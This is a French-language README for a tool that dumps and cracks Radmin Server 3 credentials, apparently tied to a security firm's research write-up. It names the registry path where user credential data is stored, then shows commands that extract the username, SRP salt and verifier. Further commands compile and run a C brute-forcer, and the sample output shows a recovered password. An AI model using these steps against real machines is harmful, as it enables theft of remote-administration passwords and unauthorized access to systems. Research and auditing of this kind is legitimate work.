
Radmin Server 3 credentials dumper/cracker
Pour plus de contexte sur cet outil, voir https://www.synacktiv.com/publications/cracking-radmin-server-3-passwords.html !
Étape 1 : Récupérez les informations utilisateur de Radmin Server 3 depuis HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Radmin\v3.0\Server\Parameters\Radmin Security. Il peut y avoir plusieurs clés de registre ici, une pour chaque utilisateur. Exportez-les à l'aide de l'option « export » du menu contextuel (clic droit) de regedit.exe. Enregistrez chacune dans un fichier différent.
Étape 2 : Exécutez python3 hash_dumper.py regkey.txt sur la clé dont vous souhaitez extraire les données. Vous pouvez fournir directement une liste de mots à l'aide de --wordlist ./test.txt si vous souhaitez bruteforcer le mot de passe, mais cela sera très lent.
$ python3 hash_dumper.py regkey.txt
Username : b'jonathan'
Modulus : 9847fc7e0f891dfd5d02f19d587d8f77aec0b980d4304b0113b406f23e2cec58cafca04a53e36fb68e0c3bff92cf335786b0dbe60dfe4178ef2fcd2a4dd09947ffd8df96fd0f9e2981a32da95503342eca9f08062cbdd4ac2d7cdf810db4db96db70102266261cd3f8bdd56a102fc6ceedbba5eae99e6127bdd952f7a0d18a79021c881ae63ec4b3590387f548598f2cb8f90dea36fc4f80c5473fdb6b0c6bdb0fdbaf4601f560dd149167ea125db8ad34fd0fd45350dec72cfb3b528ba2332d6091acea89dfd06c9c4d18f697245bd2ac9278b92bfe7dbafaa0c43b40a71f1930ebc4fd24c9e5a2e5a4ccf5d7f51544d70b2bca4af5b8d37b379fd7740a682f
Generator : 05
Salt : 16257c8778bc06b36d358a2158eb2689f484d0a25742050c5badef0af3a6d283
Verifier : 1aea28ecfa04940964396bfdb2f3e2021c761982d198baabe7668fdf661be1b03653bd2a69241710f1cc492cf7f47a453ea6c0c7dfb25327e2c07ba9b5c68130eeff5b15c5df1d87f4a3d9675a6ff19430eab76fffb16855b58372d8d5cfbf422a67d304e5586017b89e52c9176664eb61fed2a4d43ca4d9fc33cd7e8ab015764e6a3894afadebf987db36e1b0487b83598602b49c91e26b51ccd89c719cf9644f89fae5a69f7b4dc73ac5e8b7ebf1e02e7c497359207f241431fc257c5c995699a4ccb626d015859a7027aafdf008044ec70521def1d59c43dde0644777dc51bb39175920a0f6040d9167f68569573b70390c729ad430d66e779ab81cb1a88a
Étape 3 : Pour un bruteforce de mot de passe plus rapide, collez le nom d'utilisateur, le sel et le vérificateur extraits par le script Python dans les constantes du fichier radmin3_bf.c. Compilez le fichier avec g++ -o radmin3_bf -O3 radmin3_bf.c -lssl -lcrypto -lpthread.
Étape 4 : Exécutez le binaire avec le nom du fichier de la liste de mots comme premier argument : ./radmin3_bf ./test.txt.
$ ./radmin3_bf test.txt
Building big cache 1 / 10...
Building big cache 2 / 10...
Building big cache 3 / 10...
Building big cache 4 / 10...
Building big cache 5 / 10...
Building big cache 6 / 10...
Building big cache 7 / 10...
Building big cache 8 / 10...
Building big cache 9 / 10...
Building big cache 10 / 10...
Found ! bonjour0
took 0 ms